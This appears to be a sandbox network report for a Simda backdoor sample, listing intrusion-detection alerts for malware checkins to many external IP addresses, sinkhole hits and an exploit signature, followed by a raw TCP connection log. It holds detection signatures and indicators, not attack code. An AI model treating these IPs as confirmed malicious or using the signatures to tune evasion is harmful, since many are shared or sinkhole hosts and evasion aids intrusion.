2024-11-11T18:07:38.908208+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56874 | 199.59.243.227 | 80 | TCP
2024-11-11T18:07:39.016662+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56875 | 23.253.46.64 | 80 | TCP
2024-11-11T18:07:39.603334+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56872 | 208.100.26.245 | 80 | TCP
2024-11-11T18:07:39.811744+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56876 | 99.83.170.3 | 443 | TCP
2024-11-11T18:07:39.915129+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56883 | 85.17.31.82 | 80 | TCP
2024-11-11T18:07:39.990050+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56873 | 199.191.50.83 | 80 | TCP
2024-11-11T18:07:40.393903+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56884 | 154.212.231.82 | 80 | TCP
2024-11-11T18:07:40.399346+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56880 | 188.114.96.3 | 443 | TCP
2024-11-11T18:07:40.532826+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56888 | 85.17.31.82 | 80 | TCP
2024-11-11T18:07:40.748014+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56865 | 188.114.96.3 | 80 | TCP
2024-11-11T18:07:40.766398+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56884 | 154.212.231.82 | 80 | TCP
2024-11-11T18:07:41.957137+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56896 | 188.114.96.3 | 443 | TCP
2024-11-11T18:07:42.480434+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56905 | 13.248.169.48 | 80 | TCP
2024-11-11T18:07:43.094747+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56912 | 3.94.10.34 | 80 | TCP
2024-11-11T18:07:43.097029+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56913 | 18.208.156.248 | 80 | TCP
2024-11-11T18:07:43.103707+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.9 | 56913 | TCP
2024-11-11T18:07:43.103707+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.9 | 56913 | TCP
2024-11-11T18:07:43.319223+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56911 | 188.114.96.3 | 80 | TCP
2024-11-11T18:07:43.506855+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56915 | 103.150.10.48 | 80 | TCP
2024-11-11T18:07:44.573349+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56915 | 103.150.10.48 | 80 | TCP
2024-11-11T18:07:45.418961+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56920 | 188.114.96.3 | 443 | TCP
2024-11-11T18:07:45.827714+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56911 | 188.114.96.3 | 80 | TCP
2024-11-11T18:07:47.727136+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56942 | 188.114.96.3 | 443 | TCP
2024-11-11T18:07:48.335359+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56960 | 76.223.67.189 | 80 | TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.528190+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95696164.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.544333+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95696544.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.649502+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956964103.224.212.21080TCP
                                                                                                                                                                                                            2024-11-11T18:07:48.800073+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956967103.224.182.25280TCP
                                                                                                                                                                                                            2024-11-11T18:07:49.011613+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:07:49.390994+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:07:51.325141+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94926964.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:07:51.613163+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94927672.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:07:52.362516+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94927772.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:07:52.399217+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.949270TCP
                                                                                                                                                                                                            2024-11-11T18:07:54.944524+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95597352.34.198.22980TCP
                                                                                                                                                                                                            2024-11-11T18:07:54.975218+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.955973TCP
                                                                                                                                                                                                            2024-11-11T18:07:54.975218+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.955973TCP
                                                                                                                                                                                                            2024-11-11T18:07:58.285586+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95429244.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:07:59.940430+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956872208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.099845+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956872208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.144995+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95495385.17.31.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.153686+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956865188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.293301+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956884154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.308534+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95495423.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.322696+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.954955199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.369223+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95495699.83.170.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.875450+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956884154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.920285+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95496285.17.31.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:00.962845+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95496323.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:01.345730+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95496499.83.170.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:01.969269+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.954965188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:02.366358+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956865188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:04.669156+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.954978188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:05.043672+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956915103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:08:05.190951+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956911188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:05.776408+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956915103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:08:07.015466+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955002188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:07.387221+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956911188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.279058+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955020188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.679570+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.918822+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955032103.224.212.21080TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.966780+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.956966154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:08:09.967882+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.955033103.224.182.25280TCP
                                                                                                                                                                                                            2024-11-11T18:08:11.832465+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96221272.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:08:12.298141+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.955413UDP
                                                                                                                                                                                                            2024-11-11T18:08:12.333786+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96221372.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:08:20.358578+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962370199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:22.156579+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962592199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:22.212272+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96259344.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.605304+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9626053.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.606528+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96260675.2.71.19980TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.608405+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96260844.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.633836+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96260723.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.828549+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962611199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.837793+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962610208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.869278+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962604188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.929132+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96261318.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:08:25.964401+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96261444.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.239476+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962609154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.788544+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9626153.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.789277+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96261918.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:08:26.819831+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262023.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:27.235548+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962618154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:27.791975+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962603199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:28.500498+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962616199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.510956+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262344.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.522912+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962625199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.523610+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262475.2.71.19980TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.525711+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262644.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.548220+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962627208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.794161+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962628188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:30.745031+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962610208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:30.801922+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.962630TCP
                                                                                                                                                                                                            2024-11-11T18:08:30.992307+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962609154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:31.100389+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96263423.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:33.742282+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962612178.162.203.21180TCP
                                                                                                                                                                                                            2024-11-11T18:08:33.983455+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96263744.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:33.987395+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96263875.2.71.19980TCP
                                                                                                                                                                                                            2024-11-11T18:08:34.313180+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96264444.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:34.358121+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96264523.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:34.656395+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962617178.162.203.21180TCP
                                                                                                                                                                                                            2024-11-11T18:08:36.740328+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9626483.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:08:37.395138+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962650199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:43.540877+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962658178.162.203.21180TCP
                                                                                                                                                                                                            2024-11-11T18:08:43.858147+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962667199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:43.858329+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962643208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:50.600526+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962366178.162.203.21180TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.110460043 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.115001917 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.115286112 CET805686499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.142407894 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.142479897 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.149523020 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.149597883 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.181790113 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.186822891 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.340137005 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346100092 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346312046 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346312046 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.351130009 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.385200977 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.389784098 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390103102 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390163898 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390280008 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.394764900 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395071030 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395328045 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395880938 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.401926041 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.427367926 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.432348013 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.432466984 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.432598114 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.436217070 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.437614918 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.441232920 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.441320896 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.441463947 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.446459055 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.458241940 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.464454889 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.464534998 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.464807034 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.469613075 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533425093 CET805686123.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533436060 CET805686123.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533488989 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533505917 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.534485102 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.534528971 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535010099 CET805686499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535087109 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535192966 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535551071 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.539752960 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.539777040 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.539832115 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540601015 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540683985 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540798903 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540864944 CET805686499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.541017056 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.545918941 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.554245949 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.554256916 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.773797035 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.775166035 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.781763077 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.781821012 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.803682089 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.808840990 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.812273026 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.813586950 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.821355104 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.823175907 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.828866959 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.829802990 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.830867052 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.831305027 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.839762926 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.839833021 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.877521992 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.878019094 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.907919884 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.908207893 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.908217907 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.908272028 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.909487963 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.914376020 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016473055 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016578913 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016661882 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.028354883 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.028446913 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.029694080 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.029732943 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.115469933 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.120367050 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.162713051 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.162760973 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.162858009 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.163578987 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.163589001 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.500143051 CET5688380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.500634909 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.505090952 CET805688385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.505183935 CET5688380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.505973101 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074362993 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074423075 CET5687380192.168.2.9199.191.50.83
